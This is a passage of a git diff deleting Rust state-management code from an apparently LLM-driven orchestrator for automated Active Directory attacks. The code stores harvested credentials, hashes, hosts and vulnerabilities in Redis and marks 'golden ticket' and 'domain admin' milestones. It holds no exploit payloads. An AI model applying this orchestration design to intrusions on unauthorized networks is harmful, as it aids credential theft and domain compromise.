queue.connection(); - let added = reader.add_vulnerability(&mut conn, &vuln).await?; - if added { - // Also add to vuln queue ZSET for exploitation workflow - let vuln_queue_key = - format!("{}:{}:{}", state::KEY_PREFIX, operation_id, KEY_VULN_QUEUE); - let vuln_json = serde_json::to_string(&vuln).unwrap_or_default(); - let score = vuln.priority as f64; - let _: () = conn - .zadd(&vuln_queue_key, &vuln_json, score) - .await - .unwrap_or(()); - let _: () = conn.expire(&vuln_queue_key, 86400).await.unwrap_or(()); - - let mut state = self.inner.write().await; - state - .discovered_vulnerabilities - .insert(vuln.vuln_id.clone(), vuln); - } - Ok(added) - } - - /// Add a share to state and Redis (with dedup). - pub async fn publish_share(&self, queue: &TaskQueue, share: Share) -> Result { - // Check for duplicate in memory - { - let state = self.inner.read().await; - if state.shares.iter().any(|s| { - s.host.to_lowercase() == share.host.to_lowercase() - && s.name.to_lowercase() == share.name.to_lowercase() - }) { - return Ok(false); - } - } - - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let reader = RedisStateReader::new(operation_id); - let mut conn = queue.connection(); - let added = reader.add_share(&mut conn, &share).await?; - if added { - let mut state = self.inner.write().await; - state.shares.push(share); - } - Ok(added) - } - - /// Persist a timeline event to Redis and add MITRE techniques. - pub async fn persist_timeline_event( - &self, - queue: &TaskQueue, - event: &serde_json::Value, - mitre_techniques: &[String], - ) -> Result<()> { - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let reader = RedisStateReader::new(operation_id); - let mut conn = queue.connection(); - - reader.add_timeline_event(&mut conn, event).await?; - - for technique in mitre_techniques { - let _ = reader.add_technique(&mut conn, technique).await; - } - - Ok(()) - } - - /// Record a pending task in memory and persist to Redis HASH. - /// - /// Key: `ares:op:{id}:pending_tasks` — matches Python's state_backend. - pub async fn track_pending_task( - &self, - queue: &TaskQueue, - task: ares_core::models::TaskInfo, - ) -> Result<()> { - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let task_id = task.task_id.clone(); - let json = serde_json::to_string(&task).unwrap_or_default(); - - // Persist to Redis - let key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_PENDING_TASKS, - ); - let mut conn = queue.connection(); - let _: Result<(), _> = redis::AsyncCommands::hset(&mut conn, &key, &task_id, &json).await; - let _: Result<(), _> = redis::AsyncCommands::expire(&mut conn, &key, 86400i64).await; - - // Update in-memory state - let mut state = self.inner.write().await; - state.pending_tasks.insert(task_id, task); - Ok(()) - } - - /// Move a task from pending to completed, persisting both changes to Redis. - /// - /// Keys: `ares:op:{id}:pending_tasks`, `ares:op:{id}:completed_tasks` - pub async fn complete_task( - &self, - queue: &TaskQueue, - task_id: &str, - result: ares_core::models::TaskResult, - ) -> Result<()> { - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let result_json = serde_json::to_string(&result).unwrap_or_default(); - - let pending_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_PENDING_TASKS, - ); - let completed_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_COMPLETED_TASKS, - ); - - let mut conn = queue.connection(); - // Remove from pending, add to completed - let _: Result<(), _> = redis::AsyncCommands::hdel(&mut conn, &pending_key, task_id).await; - let _: Result<(), _> = - redis::AsyncCommands::hset(&mut conn, &completed_key, task_id, &result_json).await; - let _: Result<(), _> = - redis::AsyncCommands::expire(&mut conn, &completed_key, 86400i64).await; - - // Update in-memory state - let mut state = self.inner.write().await; - state.pending_tasks.remove(task_id); - state.completed_tasks.insert(task_id.to_string(), result); - Ok(()) - } - - /// Persist a NetBIOS to FQDN mapping to Redis HASH. - /// - /// Key: `ares:op:{id}:netbios_map` — matches Python's `HSET` on netbios_map. - pub async fn publish_netbios( - &self, - queue: &TaskQueue, - netbios: &str, - fqdn: &str, - ) -> Result<()> { - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_NETBIOS_MAP, - ); - let mut conn = queue.connection(); - let _: () = redis::AsyncCommands::hset(&mut conn, &key, netbios, fqdn).await?; - let _: () = redis::AsyncCommands::expire(&mut conn, &key, 86400i64).await?; - - let mut state = self.inner.write().await; - state - .netbios_to_fqdn - .insert(netbios.to_string(), fqdn.to_string()); - Ok(()) - } - - /// Add a trust relationship to state and Redis. - pub async fn publish_trust_info( - &self, - queue: &TaskQueue, - trust: ares_core::models::TrustInfo, - ) -> Result { - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let reader = RedisStateReader::new(operation_id); - let mut conn = queue.connection(); - let added = reader.add_trusted_domain(&mut conn, &trust).await?; - if added { - let domain_key = trust.domain.to_lowercase(); - let mut state = self.inner.write().await; - state.trusted_domains.insert(domain_key, trust); - } - Ok(added) - } -} diff --git a/ares-orchestrator/src/state/publishing/hosts.rs b/ares-orchestrator/src/state/publishing/hosts.rs deleted file mode 100644 index de94dbe8..00000000 --- a/ares-orchestrator/src/state/publishing/hosts.rs +++ /dev/null @@ -1,342 +0,0 @@ -//! Host and domain controller publishing methods. - -use anyhow::Result; -use redis::AsyncCommands; - -use ares_core::models::Host; -use ares_core::state::{self, RedisStateReader}; - -use crate::state::SharedState; -use crate::task_queue::TaskQueue; - -use super::is_aws_hostname; - -impl SharedState { - /// Add a host to state and Redis. - /// - /// Merges data when a host with the same IP already exists: upgrades DC - /// status, fills in hostname, and keeps the richer service list. - /// AWS internal hostnames (e.g. `ip-10-1-2-150.us-west-2.compute.internal`) - /// are stripped to allow real AD FQDNs to take precedence. - /// - /// When the hostname is a valid AD FQDN (e.g. `dc01.contoso.local`), the - /// domain suffix is automatically extracted and added to `state.domains` - /// (matches Python's `add_host()` behavior). - pub async fn publish_host(&self, queue: &TaskQueue, host: Host) -> Result { - // Normalize hostname: strip trailing dots and AWS internal names - let mut host = host; - host.hostname = host.hostname.trim_end_matches('.').to_lowercase(); - if is_aws_hostname(&host.hostname) { - host.hostname = String::new(); - } - - // Auto-extract domain from FQDN hostname (matches Python add_host) - // e.g. "dc02.child.contoso.local" → "child.contoso.local" - if !host.hostname.is_empty() - && host.hostname.contains('.') - && !is_aws_hostname(&host.hostname) - { - let hostname_clean = host.hostname.trim_end_matches('.'); - let parts: Vec<&str> = hostname_clean.split('.').collect(); - if parts.len() >= 3 { - let domain = parts[1..].join(".").to_lowercase(); - // Reject AWS/cloud domains - if !domain.contains("compute.internal") && !domain.contains("amazonaws.com") { - let op_id = self.inner.read().await.operation_id.clone(); - let mut state = self.inner.write().await; - if !state.domains.contains(&domain) { - state.domains.push(domain.clone()); - let domain_key = - format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_DOMAINS,); - let mut conn = queue.connection(); - let _: Result<(), _> = - redis::AsyncCommands::sadd(&mut conn, &domain_key, &domain).await; - let _: Result<(), _> = - redis::AsyncCommands::expire(&mut conn, &domain_key, 86400i64).await; - tracing::info!( - hostname = %host.hostname, - domain = %domain, - "Auto-extracted domain from host FQDN" - ); - } - } - - // Auto-populate netbios_to_fqdn map so CLI can resolve short names. - // e.g. "dc02.child.contoso.local" → DC02 → dc02.child.contoso.local - let short_name = parts[0].to_uppercase(); - let fqdn = host.hostname.to_lowercase(); - let _ = self.publish_netbios(queue, &short_name, &fqdn).await; - } - } - - // Check for existing host with same IP or hostname and merge if the - // new entry brings richer data (DC detection, more services, hostname). - // Returns (needs_dc_registration, was_merged_and_changed). - let (needs_dc_registration, merged_changed) = { - let mut state = self.inner.write().await; - // Look up by IP first, then fall back to hostname match - let existing_idx = state - .hosts - .iter() - .position(|h| !h.ip.is_empty() && h.ip == host.ip) - .or_else(|| { - if !host.hostname.is_empty() { - state.hosts.iter().position(|h| { - !h.hostname.is_empty() - && h.hostname.eq_ignore_ascii_case(&host.hostname) - }) - } else { - None - } - }); - if let Some(existing) = existing_idx.map(|i| &mut state.hosts[i]) { - // Merge IP if incoming has one and existing doesn't - if !host.ip.is_empty() && existing.ip.is_empty() { - existing.ip = host.ip.clone(); - } - let new_is_dc = host.is_dc || host.detect_dc(); - let was_dc = existing.is_dc; - let had_hostname = !existing.hostname.is_empty(); - let mut changed = false; - - if new_is_dc && !existing.is_dc { - existing.is_dc = true; - changed = true; - } - // Strip AWS hostname from existing entry too - if is_aws_hostname(&existing.hostname) { - existing.hostname = String::new(); - changed = true; - } - if !host.hostname.is_empty() && existing.hostname.is_empty() { - existing.hostname = host.hostname.clone(); - changed = true; - } - for svc in &host.services { - if !existing.services.contains(svc) { - existing.services.push(svc.clone()); - changed = true; - } - } - if !host.os.is_empty() && existing.os.is_empty() { - existing.os = host.os.clone(); - changed = true; - } - if !host.roles.is_empty() && existing.roles.is_empty() { - existing.roles = host.roles.clone(); - changed = true; - } - - if !changed { - return Ok(false); - } - - // Re-register DC if it just became a DC, or if its hostname - // was just filled in (so we can correct the domain mapping). - let is_dc_now = existing.is_dc; - let has_hostname_now = !existing.hostname.is_empty(); - let needs_dc = - (is_dc_now && !was_dc) || (is_dc_now && has_hostname_now && !had_hostname); - (needs_dc, true) - } else { - // No existing host — will be added below - (false, false) - } - }; - - // Register netbios mapping for merged host if hostname was updated - if merged_changed { - let state = self.inner.read().await; - if let Some(merged) = state.hosts.iter().find(|h| h.ip == host.ip) { - if merged.hostname.contains('.') { - let parts: Vec<&str> = merged.hostname.split('.').collect(); - if parts.len() >= 3 { - let short = parts[0].to_uppercase(); - let fqdn = merged.hostname.to_lowercase(); - drop(state); - let _ = self.publish_netbios(queue, &short, &fqdn).await; - } - } - } - } - - // Persist merged host to Redis LIST (find-by-IP and LSET). - if merged_changed { - let state = self.inner.read().await; - if let Some(merged) = state.hosts.iter().find(|h| h.ip == host.ip) { - let op_id = &state.operation_id; - let host_key = format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_HOSTS,); - let merged_json = serde_json::to_string(merged).unwrap_or_default(); - let mut conn = queue.connection(); - // Scan the Redis LIST to find the index matching this IP - let entries: Vec = - redis::AsyncCommands::lrange(&mut conn, &host_key, 0, -1) - .await - .unwrap_or_default(); - for (idx, entry) in entries.iter().enumerate() { - if let Ok(h) = serde_json::from_str::(entry) { - if h.ip == host.ip { - let _: Result<(), _> = redis::AsyncCommands::lset( - &mut conn, - &host_key, - idx as isize, - &merged_json, - ) - .await; - break; - } - } - } - } - } - - // If we merged into an existing host and it became/updated as DC, register it - if needs_dc_registration { - let host_snapshot = { - let state = self.inner.read().await; - state - .hosts - .iter() - .find(|h| h.ip == host.ip) - .cloned() - .unwrap() - }; - self.register_dc(queue, &host_snapshot).await?; - return Ok(true); - } - - // If the host already existed (was merged), we're done - { - let state = self.inner.read().await; - if state.hosts.iter().any(|h| h.ip == host.ip) { - return Ok(true); - } - } - - // New host — add to Redis and state - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let reader = RedisStateReader::new(operation_id); - let mut conn = queue.connection(); - reader.add_host(&mut conn, &host).await?; - - // Update DC map and domain list if this is a domain controller - if host.is_dc || host.detect_dc() { - self.register_dc(queue, &host).await?; - let mut state = self.inner.write().await; - state.hosts.push(host); - return Ok(true); - } - - let mut state = self.inner.write().await; - state.hosts.push(host); - Ok(true) - } - - /// Register a host as a domain controller: update DC map and domain list. - /// - /// Domain is derived from the FQDN hostname (e.g. `dc01.contoso.local` → `contoso.local`). - /// If the hostname is empty or not a valid AD FQDN, we fall back to the first domain - /// already in state (from the target_domain config). This ensures DCs discovered by - /// recon are registered even before their FQDN is known. - pub(crate) async fn register_dc(&self, queue: &TaskQueue, host: &Host) -> Result<()> { - // Extract domain from hostname — prefer a real FQDN - let raw_domain = if !host.hostname.is_empty() { - host.hostname - .split('.') - .skip(1) - .collect::>() - .join(".") - } else { - String::new() - }; - - // If we can't derive a domain from the hostname, fall back to the - // target domain already in state. This unblocks automation for DCs - // discovered before their FQDN is resolved. - let raw_domain = if raw_domain.is_empty() - || raw_domain.contains("compute.internal") - || raw_domain.contains("amazonaws.com") - { - let state = self.inner.read().await; - if let Some(fallback) = state.domains.first().cloned() { - tracing::info!( - ip = %host.ip, - hostname = %host.hostname, - fallback_domain = %fallback, - "DC registration: using fallback domain (no FQDN available)" - ); - fallback - } else { - tracing::debug!( - ip = %host.ip, - hostname = %host.hostname, - "Skipping DC registration: no FQDN and no fallback domain in state" - ); - return Ok(()); - } - } else { - raw_domain - }; - - let domain = raw_domain; - let domain_lower = domain.to_lowercase(); - - let mut conn = queue.connection(); - let op_id = self.inner.read().await.operation_id.clone(); - let dc_key = format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_DC_MAP); - - // Remove any stale mapping that pointed this IP to a different domain - { - let state = self.inner.read().await; - let stale_domains: Vec = state - .domain_controllers - .iter() - .filter(|(d, ip)| *ip == &host.ip && **d != domain_lower) - .map(|(d, _)| d.clone()) - .collect(); - for stale in &stale_domains { - tracing::info!( - ip = %host.ip, - old_domain = %stale, - new_domain = %domain_lower, - "Correcting DC domain mapping" - ); - let _: () = conn.hdel(&dc_key, stale).await?; - } - // Remove stale entries from state (done below under write lock) - } - - let _: () = conn.hset(&dc_key, &domain_lower, &host.ip).await?; - - // Add domain to state and Redis, correct stale mappings - let mut state = self.inner.write().await; - - // Remove stale domain → IP mappings for this IP - state - .domain_controllers - .retain(|d, ip| !(ip == &host.ip && *d != domain_lower)); - - // Insert or update the mapping - state - .domain_controllers - .insert(domain_lower.clone(), host.ip.clone()); - - if !state.domains.contains(&domain_lower) { - state.domains.push(domain_lower.clone()); - let domain_key = format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_DOMAINS); - let _: () = conn.sadd(&domain_key, &domain_lower).await?; - let _: () = conn.expire(&domain_key, 86400).await?; - } - - tracing::info!( - ip = %host.ip, - domain = %domain_lower, - "Registered domain controller" - ); - - Ok(()) - } -} diff --git a/ares-orchestrator/src/state/publishing/milestones.rs b/ares-orchestrator/src/state/publishing/milestones.rs deleted file mode 100644 index 8d90c034..00000000 --- a/ares-orchestrator/src/state/publishing/milestones.rs +++ /dev/null @@ -1,156 +0,0 @@ -//! Milestone publishing: golden ticket, domain admin. - -use std::collections::HashMap; - -use anyhow::Result; - -use ares_core::models::VulnerabilityInfo; -use ares_core::state::RedisStateReader; - -use crate::state::SharedState; -use crate::task_queue::TaskQueue; - -impl SharedState { - /// Set has_golden_ticket flag and persist to Redis. - pub async fn set_golden_ticket(&self, queue: &TaskQueue, domain: &str) -> Result<()> { - { - let state = self.inner.read().await; - if state.has_golden_ticket { - return Ok(()); - } - } - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let reader = RedisStateReader::new(operation_id); - let mut conn = queue.connection(); - reader - .set_meta_field( - &mut conn, - "has_golden_ticket", - &serde_json::Value::Bool(true), - ) - .await?; - - // Resolve DC IP for the vulnerability target - let dc_target = { - let state = self.inner.read().await; - state - .domain_controllers - .get(&domain.to_lowercase()) - .cloned() - .unwrap_or_else(|| domain.to_string()) - }; - - let mut state = self.inner.write().await; - state.has_golden_ticket = true; - tracing::info!(domain = %domain, "🏆 Golden ticket flag set"); - drop(state); - - // Synthesize a golden_ticket vulnerability so loot reflects the achievement - let vuln_id = format!("golden_ticket_{}", domain.to_lowercase()); - let mut details = HashMap::new(); - details.insert( - "domain".into(), - serde_json::Value::String(domain.to_string()), - ); - details.insert( - "note".into(), - serde_json::Value::String( - "Golden ticket forged — persistent domain access via krbtgt key".to_string(), - ), - ); - let vuln = VulnerabilityInfo { - vuln_id: vuln_id.clone(), - vuln_type: "golden_ticket".to_string(), - target: dc_target, - discovered_by: "golden_ticket_automation".to_string(), - discovered_at: chrono::Utc::now(), - details, - recommended_agent: String::new(), - priority: 1, - }; - let _ = self.publish_vulnerability(queue, vuln).await; - let _ = self.mark_exploited(queue, &vuln_id).await; - Ok(()) - } - - /// Set has_domain_admin flag and persist to Redis. - pub async fn set_domain_admin(&self, queue: &TaskQueue, path: Option) -> Result<()> { - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let reader = RedisStateReader::new(operation_id); - let mut conn = queue.connection(); - reader - .set_meta_field( - &mut conn, - "has_domain_admin", - &serde_json::Value::Bool(true), - ) - .await?; - if let Some(ref p) = path { - reader - .set_meta_field( - &mut conn, - "domain_admin_path", - &serde_json::Value::String(p.clone()), - ) - .await?; - } - - let mut state = self.inner.write().await; - state.has_domain_admin = true; - state.domain_admin_path = path.clone(); - - // Emit OTel span recording domain admin achievement. - // Walk parent_id chain from krbtgt hash to compute attack depth. - let (attack_path_str, depth) = { - let krbtgt = state.hashes.iter().find(|h| { - h.username.eq_ignore_ascii_case("krbtgt") - && h.hash_type.to_lowercase().contains("ntlm") - }); - let depth = match krbtgt { - Some(h) => { - // Count chain depth by walking parent_id - let mut d = 1usize; - let mut current_id = h.parent_id.clone(); - let mut seen = std::collections::HashSet::new(); - while let Some(ref pid) = current_id { - if !seen.insert(pid.clone()) { - break; - } - d += 1; - // Check credentials then hashes for the parent - if let Some(c) = state.credentials.iter().find(|c| c.id == *pid) { - current_id = c.parent_id.clone(); - } else if let Some(h2) = state.hashes.iter().find(|h2| h2.id == *pid) { - current_id = h2.parent_id.clone(); - } else { - break; - } - } - d - } - None => 0, - }; - let ap = path - .as_deref() - .filter(|s| !s.is_empty()) - .unwrap_or("domain_admin_achieved") - .to_string(); - (ap, depth) - }; - let op_id = state.operation_id.clone(); - drop(state); - - let span = - ares_core::telemetry::spans::trace_domain_admin(&attack_path_str, depth, Some(&op_id)); - let _guard = span.enter(); - tracing::info!(attack_path = %attack_path_str, depth = depth, "🏆 Domain admin achieved"); - - Ok(()) - } -} diff --git a/ares-orchestrator/src/state/publishing/mod.rs b/ares-orchestrator/src/state/publishing/mod.rs deleted file mode 100644 index 843db1f5..00000000 --- a/ares-orchestrator/src/state/publishing/mod.rs +++ /dev/null @@ -1,117 +0,0 @@ -//! Publishing methods — add credentials, hashes, hosts, and vulnerabilities -//! to both in-memory state and Redis. - -mod credentials; -mod entities; -mod hosts; -mod milestones; - -use regex::Regex; -use std::sync::LazyLock; - -/// Regex matching `Password` (case-insensitive) followed by optional `:` and space. -pub(super) static PASSWORD_PREFIX_RE: LazyLock = - LazyLock::new(|| Regex::new(r"(?i)^password\s*:\s*").unwrap()); - -/// Regex matching trailing parenthetical metadata like ` (Guest)`, ` (Pwn3d!)`. -pub(super) static TRAILING_PAREN_RE: LazyLock = - LazyLock::new(|| Regex::new(r"\s+\([^)]+\)\s*$").unwrap()); - -/// Sanitize and validate a credential before storage. -/// -/// Mirrors Python's `add_credential()` — strips noise from password values, -/// normalizes `user@domain@domain` usernames, resolves NetBIOS domains to FQDN, -/// and rejects invalid entries. Returns `None` if the credential should be dropped. -pub(super) fn sanitize_credential( - mut cred: ares_core::models::Credential, - netbios_to_fqdn: &std::collections::HashMap, -) -> Option { - use crate::output_extraction::strip_ansi; - - // Strip ANSI escape codes (tools like NetExec emit colored output) - cred.username = strip_ansi(&cred.username); - cred.password = strip_ansi(&cred.password); - cred.domain = strip_ansi(&cred.domain); - - // Trim whitespace - cred.username = cred.username.trim().to_string(); - cred.password = cred.password.trim().to_string(); - cred.domain = cred.domain.trim().to_string(); - - // Strip "Password: " / "Password:" prefix from password - if PASSWORD_PREFIX_RE.is_match(&cred.password) { - cred.password = PASSWORD_PREFIX_RE.replace(&cred.password, "").to_string(); - } - - // Strip trailing parenthetical metadata: "svc_test (Guest)" → "svc_test" - if TRAILING_PAREN_RE.is_match(&cred.password) { - cred.password = TRAILING_PAREN_RE.replace(&cred.password, "").to_string(); - } - - // Strip ellipsis truncation artifacts (matches Python add_credential) - while cred.password.ends_with("...") { - cred.password = cred.password[..cred.password.len() - 3].trim().to_string(); - } - while cred.password.ends_with('\u{2026}') { - cred.password.pop(); - cred.password = cred.password.trim().to_string(); - } - - // Normalize username with embedded @domain suffixes - // e.g. "sam.wilson@child.contoso.local@fabrikam.local" - // → username="sam.wilson", domain="child.contoso.local" - if cred.username.contains('@') { - let username_clone = cred.username.clone(); - let parts: Vec<&str> = username_clone.splitn(2, '@').collect(); - if parts.len() == 2 && !parts[0].is_empty() { - let base_username = parts[0].to_string(); - let domain_part = parts[1].split('@').next().unwrap_or(parts[1]).to_string(); - if domain_part.contains('.') { - cred.username = base_username; - cred.domain = domain_part; - } - } - } - - // Resolve NetBIOS domain to FQDN (e.g. "CHILD" → "child.contoso.local") - if !cred.domain.is_empty() && !cred.domain.contains('.') { - let domain_upper = cred.domain.to_uppercase(); - if let Some(fqdn) = netbios_to_fqdn.get(&domain_upper) { - // netbios_to_fqdn maps SHORTNAME → host.contoso.local - // Extract the domain suffix - let parts: Vec<&str> = fqdn.split('.').collect(); - if parts.len() >= 3 { - cred.domain = parts[1..].join("."); - } else { - cred.domain = fqdn.clone(); - } - } else { - // Try matching domain as prefix of any FQDN domain suffix - let domain_lower = cred.domain.to_lowercase(); - for fqdn in netbios_to_fqdn.values() { - let fqdn_parts: Vec<&str> = fqdn.split('.').collect(); - if fqdn_parts.len() >= 3 { - let domain_suffix = fqdn_parts[1..].join("."); - let first_label = fqdn_parts[1].to_lowercase(); - if first_label == domain_lower { - cred.domain = domain_suffix; - break; - } - } - } - } - } - - // Validate after sanitization - if !crate::output_extraction::is_valid_credential(&cred.username, &cred.password) { - return None; - } - - Some(cred) -} - -/// Check if a hostname is an AWS internal PTR name. -pub(super) fn is_aws_hostname(hostname: &str) -> bool { - let lower = hostname.to_lowercase(); - lower.starts_with("ip-") && lower.contains("compute.internal") -} diff --git a/ares-orchestrator/src/state/shared.rs b/ares-orchestrator/src/state/shared.rs deleted file mode 100644 index 3240e03c..00000000 --- a/ares-orchestrator/src/state/shared.rs +++ /dev/null @@ -1,234 +0,0 @@ -//! SharedState — thread-safe wrapper around StateInner. - -use std::sync::Arc; -use tokio::sync::RwLock; - -use super::inner::StateInner; - -/// Thread-safe shared state with read/write access. -#[derive(Clone)] -pub struct SharedState { - pub(super) inner: Arc>, -} - -impl SharedState { - /// Create a new empty state. - pub fn new(operation_id: String) -> Self { - Self { - inner: Arc::new(RwLock::new(StateInner::new(operation_id))), - } - } - - /// Create a cheap snapshot of state for prompt generation. - /// - /// Clones the relevant fields so the RwLock is released before LLM calls. - pub async fn snapshot(&self) -> ares_llm::prompt::StateSnapshot { - let s = self.inner.read().await; - - // Compute undominated forests inline (avoids re-acquiring lock) - let undominated = crate::completion::compute_undominated_forests( - s.target.as_ref().map(|t| t.domain.as_str()), - s.domains.first().map(|d| d.as_str()), - &s.trusted_domains, - &s.dominated_domains, - ); - - ares_llm::prompt::StateSnapshot { - credentials: s.credentials.clone(), - hashes: s.hashes.clone(), - hosts: s.hosts.clone(), - shares: s.shares.clone(), - domains: s.domains.clone(), - discovered_vulnerabilities: s.discovered_vulnerabilities.clone(), - exploited_vulnerabilities: s.exploited_vulnerabilities.clone(), - domain_controllers: s.domain_controllers.clone(), - netbios_to_fqdn: s.netbios_to_fqdn.clone(), - has_domain_admin: s.has_domain_admin, - has_golden_ticket: s.has_golden_ticket, - undominated_forests: undominated, - delegation_accounts: s - .discovered_vulnerabilities - .values() - .filter(|v| { - let vt = v.vuln_type.to_lowercase(); - vt == "constrained_delegation" || vt == "rbcd" - }) - .filter_map(|v| { - v.details - .get("account_name") - .or_else(|| v.details.get("AccountName")) - .and_then(|x| x.as_str()) - .map(|s| s.to_lowercase()) - }) - .collect(), - } - } - - /// Read-only access to the state. - pub async fn read(&self) -> tokio::sync::RwLockReadGuard<'_, StateInner> { - self.inner.read().await - } - - /// Write access to the state. - pub async fn write(&self) -> tokio::sync::RwLockWriteGuard<'_, StateInner> { - self.inner.write().await - } - - /// Get the vuln queue ZSET key. - pub async fn vuln_queue_key(&self) -> String { - let state = self.inner.read().await; - format!( - "{}:{}:{}", - ares_core::state::KEY_PREFIX, - state.operation_id, - super::KEY_VULN_QUEUE - ) - } - - /// Get the discovery list key. - pub async fn discovery_key(&self) -> String { - let state = self.inner.read().await; - format!("{}:{}", super::DISCOVERY_KEY_PREFIX, state.operation_id) - } - - /// Get the operation ID. - pub async fn operation_id(&self) -> String { - self.inner.read().await.operation_id.clone() - } -} - -#[cfg(test)] -mod tests { - use super::*; - use ares_core::models::*; - use std::collections::HashMap; - - #[tokio::test] - async fn test_shared_state_new() { - let state = SharedState::new("op-test".into()); - assert_eq!(state.operation_id().await, "op-test"); - } - - #[tokio::test] - async fn test_snapshot_empty_state() { - let state = SharedState::new("op-1".into()); - let snap = state.snapshot().await; - assert!(snap.credentials.is_empty()); - assert!(snap.hashes.is_empty()); - assert!(snap.hosts.is_empty()); - assert!(snap.shares.is_empty()); - assert!(snap.domains.is_empty()); - assert!(snap.discovered_vulnerabilities.is_empty()); - assert!(snap.exploited_vulnerabilities.is_empty()); - assert!(snap.domain_controllers.is_empty()); - assert!(!snap.has_domain_admin); - assert!(!snap.has_golden_ticket); - } - - #[tokio::test] - async fn test_snapshot_reflects_state_mutations() { - let state = SharedState::new("op-1".into()); - - // Mutate state directly - { - let mut inner = state.write().await; - inner.credentials.push(Credential { - id: "c1".into(), - username: "admin".into(), - password: "pass".into(), - domain: "contoso.local".into(), - source: "test".into(), - discovered_at: None, - is_admin: true, - parent_id: None, - attack_step: 0, - }); - inner.domains.push("contoso.local".into()); - inner - .domain_controllers - .insert("contoso.local".into(), "192.168.58.10".into()); - inner.has_domain_admin = true; - } - - let snap = state.snapshot().await; - assert_eq!(snap.credentials.len(), 1); - assert_eq!(snap.credentials[0].username, "admin"); - assert_eq!(snap.domains, vec!["contoso.local"]); - assert_eq!( - snap.domain_controllers.get("contoso.local"), - Some(&"192.168.58.10".to_string()) - ); - assert!(snap.has_domain_admin); - } - - #[tokio::test] - async fn test_snapshot_is_independent_copy() { - let state = SharedState::new("op-1".into()); - { - let mut inner = state.write().await; - inner.domains.push("contoso.local".into()); - } - - let snap = state.snapshot().await; - assert_eq!(snap.domains.len(), 1); - - // Mutate state after snapshot - { - let mut inner = state.write().await; - inner.domains.push("fabrikam.local".into()); - } - - // Snapshot should still have only 1 domain - assert_eq!(snap.domains.len(), 1); - - // New snapshot should have 2 - let snap2 = state.snapshot().await; - assert_eq!(snap2.domains.len(), 2); - } - - #[tokio::test] - async fn test_vuln_queue_key() { - let state = SharedState::new("op-abc".into()); - let key = state.vuln_queue_key().await; - assert!(key.contains("op-abc")); - assert!(key.ends_with("vuln_queue")); - } - - #[tokio::test] - async fn test_discovery_key() { - let state = SharedState::new("op-xyz".into()); - let key = state.discovery_key().await; - assert!(key.contains("op-xyz")); - assert!(key.starts_with("ares:discoveries:")); - } - - #[tokio::test] - async fn test_snapshot_with_vulnerabilities() { - let state = SharedState::new("op-1".into()); - { - let mut inner = state.write().await; - let mut details = HashMap::new(); - details.insert("account".into(), serde_json::json!("svc_sql")); - inner.discovered_vulnerabilities.insert( - "vuln-001".into(), - VulnerabilityInfo { - vuln_id: "vuln-001".into(), - vuln_type: "constrained_delegation".into(), - target: "192.168.58.20".into(), - discovered_by: "recon".into(), - discovered_at: chrono::Utc::now(), - details, - recommended_agent: "privesc".into(), - priority: 3, - }, - ); - inner.exploited_vulnerabilities.insert("vuln-002".into()); - } - - let snap = state.snapshot().await; - assert_eq!(snap.discovered_vulnerabilities.len(), 1); - assert!(snap.discovered_vulnerabilities.contains_key("vuln-001")); - assert_eq!(snap.exploited_vulnerabilities.len(), 1); - assert!(snap.exploited_vulnerabilities.contains("vuln-002")); - } -} diff --git a/ares-orchestrator/src/task_queue.rs b/ares-orchestrator/src/task_queue.rs deleted file mode 100644 index 2385e9e3..00000000 --- a/ares-orchestrator/src/task_queue.rs +++ /dev/null @@ -1,488 +0,0 @@ -//! Redis-backed task queue matching the Python `RedisTaskQueue`. -//! -//! Key patterns: -//! - `ares:tasks:{role}` — List, per-role task queue -//! - `ares:results:{task_id}` — List, per-task result mailbox (TTL 24h) -//! - `ares:heartbeat:{agent}` — String, agent heartbeat (TTL from config) -//! - `ares:task_status:{task_id}` — String, task lifecycle JSON -//! - `ares:lock:{op_id}` — String, operation lock with TTL refresh -//! -//! Workers BRPOP from the right; the orchestrator pushes to the left (LPUSH) -//! for normal priority and to the right (RPUSH) for urgent priority, giving -//! FIFO semantics with priority bypass. - -use std::collections::HashMap; -use std::time::Duration; - -use anyhow::{Context, Result}; -use chrono::{DateTime, Utc}; -use redis::aio::ConnectionManager; -use redis::AsyncCommands; -use serde::{Deserialize, Serialize}; -use tracing::{debug, info, warn}; -use uuid::Uuid; - -// --------------------------------------------------------------------------- -// Constants — must match the Python RedisTaskQueue class attributes exactly. -// --------------------------------------------------------------------------- - -pub const TASK_QUEUE_PREFIX: &str = "ares:tasks"; -pub const RESULT_QUEUE_PREFIX: &str = "ares:results"; -pub const HEARTBEAT_PREFIX: &str = "ares:heartbeat"; -pub const TASK_STATUS_PREFIX: &str = "ares:task_status"; -pub const LOCK_PREFIX: &str = "ares:lock"; -pub const STATE_UPDATE_CHANNEL_PREFIX: &str = "ares:state:updates"; - -/// Result keys expire after 24 hours. -const RESULT_TTL_SECS: u64 = 60 * 60 * 24; - -/// Task status keys expire after 24 hours. -const TASK_STATUS_TTL_SECS: u64 = 60 * 60 * 24; - -// --------------------------------------------------------------------------- -// Wire types — JSON-compatible with the Python TaskMessage / TaskResult. -// --------------------------------------------------------------------------- - -/// Task submitted to a role queue. Mirrors `ares.core.task_queue.TaskMessage`. -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct TaskMessage { - pub task_id: String, - pub task_type: String, - pub source_agent: String, - pub target_agent: String, - pub payload: serde_json::Value, - #[serde(default = "default_priority")] - pub priority: i32, - pub created_at: Option>, - pub callback_queue: Option, -} - -fn default_priority() -> i32 { - 5 -} - -/// 